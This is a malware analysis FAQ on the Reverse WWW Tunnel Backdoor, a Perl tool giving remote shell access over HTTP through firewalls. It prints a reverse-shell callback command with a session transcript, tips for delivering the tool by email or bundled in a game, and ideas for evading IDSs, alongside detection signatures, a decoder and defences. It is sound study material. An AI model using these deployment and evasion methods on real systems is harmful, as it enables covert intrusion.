Malware FAQ: Reverse WWW Tunnel Backdoor

Author: Chris Young

Exploit Details:

Name: Reverse WWW Tunnel Backdoor

Filename: rwwwshell-1_6_perl.txt or rw3.pl

Version: 1.6

Author: van Hauser

E-mail: vh@reptile.rug.ac.be

Operating system: The product is OS independent as it uses Perl interpreters, however its main focus is Linux, Free BSD and Solaris.

Brief Description: A proof of concept tool that allows an attacker to access commands (typically shell) on a remote server via HTTP, through firewalls.

Introduction

Reverse WWW tunnel backdoor (RW3) is a tool that facilitates the interaction of two systems through the HTTP protocol. Initially written as a proof of concept script in 1998 by van Hauser the originator of the war dialler THC.

The prime reason for writing the script was to test whether it would be possible to create a tool capable of circumventing firewalls, by camouflaging the communications inside a normal HTTP session.

Written in Perl the original script has gone through a few iterations to reach the current version of 1.6, adding along the way Unix perl portability and Proxy compatibility.

Protocol: HTTP

The script utilises the GET command from the HTTP command set to pass encoded information in a way that looks like natural web browsing traffic.

Typically sitting upon a TCP/IP protocol (port 80), the makeup of HTTP is plain text, and most closely resembles an English high-level programming language.

Description of Variants

There are currently no direct descendants of this program that have been ported to other platforms. This is possibly due to the fact the Perl is represented on many platforms, and as such the script itself does not need to be ported.

There is similar 'C' based competitor product from 'nocrew' that is under more active development called 'http tunnel 3.3' which is capable of tunnelling other protocols through its HTTP connection. More information on this can be found at www.nocrew.org/software/httptunnel.html , and a review of its functionality can be found at www.sans.org/y2k/practical/Paul_Lochbihler.zip

How the exploit works

The script modifies its process name to camouflage its presence on the host computer. By default it uses 'vi', however this function does not work under Windows NT/2000 Pro. If it did 'Explorer' or 'Taskmgr' would be simple to insert and would be more appropriate for a Windows platform.

The script uses $CGI_PREFIX to determine which HTTP command to use to pass information through the firewall. It then appends a Uuencoded message to the end of this command, which is passed to and from STDIN and STDOUT on the Master and Slave systems.

Using the /cgi-bin/ command style prevents the data being cached by proxies, by mimicking the common method for passing parameters to CGI programs. This is to append them to the command line following the '?', character making it look like natural traffic.

Once the master has sent the message to the slave, it executes the required command ($Shell, line 40) and passes the Uudecoded message to it. The output is then collected and after an agreed delay ($Delay, line 41) is passed back in the same fashion.

Common items found in the CGI directory are:
Xbase, Mysql, Form, Common, Status, FCGI, Printenv and test-cgi

Subsequently modifying line 27 to masquerade the HTTP GET request with any of these will make the messages seem more natural and assist in confusing the IDS systems further.

Should anyone attempt to access the server without the script and password, they would get the following error message in an attempt to confuse them:

The error is the result of the following code, which modifies the title and the body text to indicate that the requested file no longer exists.

sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION

Deployment

As a means to running the script on a remote system, a certain amount of information needs to be attained:

•  Knowledge of target operating system
•  Is Perl installed?
•  Is a proxy needed?
•  Does the proxy require a password?

Once this information has been ascertained, it is possible to determine the best form of attack.

Direct access: If the system has been compromised earlier, or the attacker has access for some other reason, then the above information is easily gathered, and the script can simply be run with any preferred settings.

Via E-Mail: Sending the script via E-Mail is possibly the most problematic method, as the above information is not so readily available. However it would be possible to gain a reasonable level of success by targeting UNIX based systems, as they have a higher likelihood of having Perl installed.

Another problem is, many UNIX based web servers will have Perl installed, but few users or administrators use these systems for mail retrieval/viewing.

Windows/Intel based systems could be targeted by wrapping the compiled version of the script inside another program (a game etc.) using a tool like Silk . This would have the benefit of not requiring the host system to have a Perl interpreter installed, but would depend on the compilers ability to overcome the Windows problems described further on in this document (see page 14).

How to use the exploit

The original version (v1.6) only took one proper input, that of '-h' for the help text.

Entering any other text after the scripts name would change the default running mode from that of Master to Slave utilising the internal variables defined early in the script for target-address and port etc.

The version that I altered as an aide to understanding the attack method takes the following parameters:

perl rw3.pl Target-addr port
(some systems do not require the preceding 'perl')

Where Target-addr is either the IP address or a FQDN (full qualified domain name) and port is the target port over which to communicate. If no entry is made for port the system assumes port 8080.

For the script to work through firewalls in its intended way it should use ports 80, 8080 or 443, although any will work as long as they are not already allocated on the target or hosts systems.

Many other system modifications are available, such as, Process, User and password. If these were to be converted to function from the command line a proper parser of the $ARGV[n] input should be considered.

Example of a Windows NT Master (attacker) and a Linux system

The following is the output from both the Master and slave for a simple session using rw3.pl:

Master
C:\> perl rw3.pl
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it's output and then
type in your commands to execute on SLAVE. You'll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn't try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don't like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.

Waiting for connect ... connect from unresolved/10.0.0.1:1029
[Warning! No output from remote!]
> dir
sent.

Waiting for connect ... connect from unresolved/10.0.0.1:1030
ghost ntfsdos.exe rmtshare.exe rw3.pl
sent.

Waiting for connect ... connect from unresolved/10.0.0.1:1031
cd / ; dir
sent.

Waiting for connect ... connect from unresolved/10.0.0.1:1032
bin dev home lost+found opt root tmp usr
boot etc lib mnt proc sbin tools var
sent.

Waiting for connect ... ^C

Slave

#perl rw3.pl 10.0.0.2 8080
starting in slave mode to 10.0.0.2 on port 8080
Items in bold are input from the attacker, and italics are responses from the remote system.

As you can see the first example is a simple 'dir' (Linux accepts this, and I like the formatting) whereas the second example has 'cd / ; dir' demonstrating the systems ability to take multiple commands on one line separated by a ';' (semicolon).

As you would expect, not much happens on the slave (attacked) system to indicate any activity.

Options for change:

Lines 27 through 49 allow for simple changes to the function of the system, they are:

Line
Variable
Description

27

CGI_Prefix

HTTP command use to hide with normal traffic

28

Mask

Name of local command to use in process table

29

Password

Password to prevent other RW3 slaves using your Master!

34

Listen_port

Port over which the traffic will initiate

35

Server

IP address of Master

40

Shell

Command that should run on slave once a connected

41

Delay

Time in seconds to delay output from commands

42

Time

When connections should be initiated, leave blank for now.

43

Daily

Indicates if the connection should be repeated daily.

44

Proxy

IP address of internal proxy server.

45

Proxy_port

Port over which traffic will travel

46

Proxy_user

User ID used to authenticate with the proxy server

47

Proxy_password

Password for above.

48

Debug

Used to enable specific script debugging output.

49

Broken_recv

Fix for AIX and Open BSD recv network problem

There is no easy method for attempting to carry this exploit out by hand, as the server (slave) component needs to be active at the remote site, and by the nature of the tool, it sits and waits for compromised systems to call in.

Signature of the attack

On NT the following are visible when reviewing the Task Manager:

This clearly shows that the $Mask command on line 28 does not effect Windows.

On the Linux system the script shows up in the process table in the following way:

UID PID PPID C STIME TTY TIME CMD
root 1075 1071 0 11:42 pts/0 00:00:00 bash
root 1108 1105 0 11:47 pts/1 00:00:00 bash
root 1196 1075 1 12:28 pts/0 00:00:00 vi
root 1197 1196 0 12:28 pts/0 00:00:00 /bin/sh
root 1198 1108 0 12:29 pts/1 00:00:00 ps -ef
NB: The above table has been cut down to show only the relevant information

In the above table, the attackers process has been hidden behind 'vi' (in bold)

Output from NETSTAT -NA on a Windows NT system:

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:37 0.0.0.0:0 LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:123 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
The above system is a workstation, and as such would not normally have port 80 in listening mode.

The following is the output from netstat -na on a Linux system when rw3.pl is running in master mode (listening for slaves):

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
A scan of the attack in progress is in Appendix B, with the payload areas in bold.

The following Perl script can be used to extract the password and message from the scan output of Snort.

$test = $ARGV[0];
$test =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$test =~ tr/'b'/"'"/;
$decoded = unpack "u", "$test";
print stdout $decoded;
NB: file saved as decode.pl for this test.

Its input is via the command line, and an example is:

perl decode.pl M5mAl9VAOjW0rdgYT9GvDfWkN97AEdsqR96vY8VQEi
9strjFUTjVAAjF4N97AEz1dsqRaRYPfstrjGjSfRYPftHtz

Which give the following output. The first three characters in this case are the password (this may not be the case for all traces, the length is down to the attacker).

THCghost ntfsdos.exe recycled rmtshare.exe rw.pl

How to protect against it

Utilise password protection on your proxies, and change them regularly.

Using Microsoft Proxy and the authentication methods built into Internet Explorer, although the Winsock proxy client should not be activated, as it supports legacy applications, and would effectively negate the need for the scripts proxy navigation.

Implement good internal security policies and user training.

If your desktop is Windows based, it is possible to restrict the users ability to run unauthorised packages.

Monitor all incoming email and web downloads for the signatures of known attackers tools. This alone would not prevent all of the tools getting in, however it would spike your interest enough to investigate the user in question.

The monitoring of user login times and system access correlation is possible, although the work involved would be quite onerous. This would also suffer from many false positives if users do not logout or simply turn their PC's off at night!

The author suggests using a second network detached from the primary for Internet access, which is impracticable for most organisations, but would obviously work.

Possible enhancements

Independence

Compiling the script with any of the following compilers would remove the products reliance on the target system having Perl installed:

http://language.perl.com/news/compiler-alpha1.html

http://filewatcher.org/sec/perl-compiler/int_halfyear.html

IP address cycling

The ability to modify the target IP address on the slave, would further camouflage the packets passing through the firewall and IDS's. Mixing Cdor's ability to sniff packets from the net that are not seemingly intended for it, with IP source routing to an address that passes the Masters interface would allow traversal of a firewall without giving away the real address of the Master.

Passing through frag-router

As an aide to avoiding some IDS's, the packets could be further obscured by forwarding them through FragRouter, which will fragment the packets enough to confuse earlier or less sophisticated IDS's.

HTTPS

Currently the use of HTTP allows administrators to see the actual commands being executed once the attack has been detected, and the logs have been analysed. A transition to HTTPS would prevent such viewing, whilst retaining the nature of the product with respect to traversing firewalls, through masquerading as normal traffic.

Encryption of the payload

Another method to restrict the abilities of administrators to view the contents, would be to pass the desired commands and subsequent output through an encryption package, such as Blowfish, prior to transmission. The resulting encrypted message would then need to be Uuencoded prior to transmission to prevent control characters being transmitted.

Where to get it

As the program is written in Perl, it is possible to simply cut and paste the text from this document into a new document and save it with the usual .pl extension.

NB: The script is in a table, so highlighting the second column and copying it then pasting into notepad etc. will be required.

For the latest version the author suggests r3wt.base.org however this site was unavailable for the duration of the creation of this document, however the author himself is based at www.thehackerschoice.com .

The usual repositories retain copies such as:
packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl

A number of Perl script interpreters are available from:
www.perl.com/pub/a/language/info/software.html www.activestate.com/ASPN/Downloads/
although the majority of Linux systems come with it either pre-installed or as some form of package.

Dependencies

The prime dependency is a Perl interpreter, which has the ability to send and receive network packets.

Compatible platforms.

Any platform that supports Perl, however the author has only tested it working on:

•  Linux;
•  Solaris;
•  Open BSD; and
•  AIX.

Although Open BSD and AIX are reported to have problems with 'recv' responses, there is a workaround within the script.

Windows NT and 2000 professional do work as Masters, however the fork() command causes problems when in slave mode. This is discussed later on in the document.

These problems might at some stage be resolved by newer versions of their respective Perl interpreters.

Problems running under Windows

The 'Master' part of the script has no problems working on either Windows NT or Windows 2000 professional, however the 'Slave' portion reports the following errors:

perl rw3.pl 10.0.0.1
starting in slave mode to 10.0.0.1 on port 8080

Slave activated
Bizarre SvTYPE [193] at rw3.pl line 137.

Which relates to the following line of code:
$pid = fork;

Investigating the implementation of the ActivePerl (5.6.0 build 623) version of Perl, it becomes clear that the fork command is merely emulated under Windows, as it does not directly support use of the fork() command

The following is a quote from the ActivePerl manual:

"On some platforms such as Windows where the fork() system call is not available, Perl can be built to emulate fork() at the interpreter level. While the emulation is designed to be as compatible as possible with the real fork() at the level of the Perl program, there are certain important differences that stem from the fact that all the pseudo child ``processes'' created this way live in the same real process as far as the operating system is concerned."

The script manifests none of these problems under Linux (Red Hat 7) however it does recognise that problems exist with interpretations of Perl, as lines 49,206 and 268 turn on a kludge to get round a problem the author encountered with Open BSD and Solaris.

As the problem exists in the code that attempts to fork a new process, a possible solution would be to accept that the commands run by the attacker might hang the running process and as such remove the attempt to fork. The script would work, however any errors or crashes would stop the remote access. This could be worked round by using the 'at' command to run the script at a specific time instead of relying on the forking process. A side effect of this would be that the command would show up in the 'at' table.

The best solution is to get a version of Perl that works properly with fork() commands or find another method for running the scripts

Conclusion

Overall, a well thought out and executed script that clearly achieves its goal as a proof of concept. The script is reasonably well documented, which lends itself to simple tweaks and enhancements by individuals at all programming levels.

Although it appears development on the product has ceased, the methods it deploys work today and with a few of the suggested improvements could make this a formidably stealthy tool.

The current dependency on Perl interpreters limits the scripts ability to propagate as widely as might be desired, however using the Perl compiler or re-scripting it into C would be a relatively simple task.

With Microsoft seemingly encouraging the use of common port tunnelling by providing developers with code capable of traversing firewalls for control (RPC) calls, it can only be short time before encryption is added to these products and the battle sways in favour of the attacker.

Additional Information

ActiveState ActivePerl HTML manual - Software install required

An interesting article on how to find backdoors in Firewalls can be found at:
http://www.itsecurity.com/papers/p37.htm#example

NoCrew's HPPT Tunnel software can be found at:
http://www.nocrew.org/software/httptunnel.html

A useful repository of attacker software and information can be found at:
www.packetstormsecurity.org

A useful source of security information can be found at:
www.securityfocus.com

The inspiration for this document came from a training seminar given at the SANS Baltimore conference by Eric Cole and Edward Skoudis in 2001. Kind permission to extend the information found in the training course was given by Eric Cole.

Appendix - Snort scan

-*> Snort! <*-
Version 1.3.1
By Martin Roesch (roesch@clark.net, www.clark.net/~roesch)
Decoding Ethernet on interface eth0

07/23-12:16:12.335290 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x5A
10.0.0.2:1034 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:100 DF
***PA* Seq: 0xB49761F3 Ack: 0xCF33CA Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 6C 35 6D 41 6C 7A 20 48 54 54 50 2F 31 er?l5mAlz HTTP/1
2E 30 0A 0A .0..

07/23-12:16:12.460256 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40
10.0.0.1:8080 -> 10.0.0.2:1034 TCP TTL:128 TOS:0x0 ID:62072 DF
****A* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
00 00 00 00 00 00 74 A2 57 4D ......t.WM
07/23-12:16:32.343130 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x48
10.0.0.1:8080 -> 10.0.0.2:1034 TCP TTL:128 TOS:0x0 ID:2681 DF

***PA* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
62 35 6D 41 6C 39 67 45 52 73 72 74 74 7A 82 1F b5mAl9gERsrttz..
A2 AC ..

07/23-12:16:32.343231 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36
10.0.0.2:1034 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:104 DF
****A* Seq: 0xB4976217 Ack: 0xCF33D8 Win: 0x7D78

07/23-12:16:32.343310 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40
10.0.0.1:8080 -> 10.0.0.2:1034 TCP TTL:128 TOS:0x0 ID:2937 DF
*F**A* Seq: 0xCF33D8 Ack: 0xB4976217 Win: 0x2214
00 00 00 00 00 00 D8 01 AD 9A ..........

07/23-12:16:32.343423 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36
10.0.0.2:1034 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:105 DF
****A* Seq: 0xB4976217 Ack: 0xCF33D9 Win: 0x7D78

07/23-12:16:33.353858 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36
10.0.0.2:1034 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:106 DF
*F**A* Seq: 0xB4976217 Ack: 0xCF33D9 Win: 0x7D78

07/23-12:16:33.354093 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40
10.0.0.1:8080 -> 10.0.0.2:1034 TCP TTL:128 TOS:0x0 ID:3193 DF
****A* Seq: 0xCF33D9 Ack: 0xB4976218 Win: 0x2214
00 00 00 00 00 00 46 C9 14 97 ......F...

07/23-12:16:38.374391 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x4A
10.0.0.2:1035 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:107 DF
S***** Seq: 0xB5FB24A9 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 Opt 4:TS: 380335 0 NOP WS: 0

07/23-12:16:38.374654 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40
10.0.0.1:8080 -> 10.0.0.2:1035 TCP TTL:128 TOS:0x0 ID:3449 DF
S***A* Seq: 0xCF998E Ack: 0xB5FB24AA Win: 0x2238
TCP Options => MSS: 1460
00 00 B2 39 47 A4 ...9G.

07/23-12:16:38.374728 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36
10.0.0.2:1035 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:108 DF
****A* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78

07/23-12:16:38.375378 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0xAC
10.0.0.2:1035 -> 10.0.0.1:8080 TCP TTL:64 TOS:0x0 ID:109 DF
***PA* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 4D 35 6D 41 6C 39 56 41 4F 6A 57 30 72 er?M5mAl9VAOjW0r
64 67 59 54 39 47 76 44 66 57 6B 4E 39 37 41 45 dgYT9GvDfWkN97AE
64 73 71 52 39 36 76 59 38 56 51 45 39 73 74 72 dsqR96vY8VQE9str
6A 46 55 54 6A 56 41 41 6A 46 34 4E 39 37 41 45 jFUTjVAAjF4N97AE
7A 31 64 73 71 52 61 52 59 50 66 73 74 72 6A 47 z1dsqRaRYPfstrjG
6A 53 66 52 59 50 66 74 48 74 7A 20 48 54 54 50 jSfRYPftHtz HTTP
2F 31 2E 30 0A 0A /1.0..

07/23-12:16:38.490980 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40
10.0.0.1:8080 -> 10.0.0.2:1035 TCP TTL:128 TOS:0x0 ID:3961 DF
****A* Seq: 0xCF998F Ack: 0xB5FB2520 Win: 0x21C2
00 00 00 00 00 00 06 6B 15 B9 .......k..

07/23-12:17:01.405007 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40
10.0.0.1:8080 -> 10.0.0.2:1035 TCP TTL:128 TOS:0x0 ID:12153 DF
***PA* Seq: 0xCF998F Ack: 0xB5FB2520 Win: 0x21C2
6C 35 6D 41 6C 7A 36 83 D0 84 l5mAlz6...

Exiting...